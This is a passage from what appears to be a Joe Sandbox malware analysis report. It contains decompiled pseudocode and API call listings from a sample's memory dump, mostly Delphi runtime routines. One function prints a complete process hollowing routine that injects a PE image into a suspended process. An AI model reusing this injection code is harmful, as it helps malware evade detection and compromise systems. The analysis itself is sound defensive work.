      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
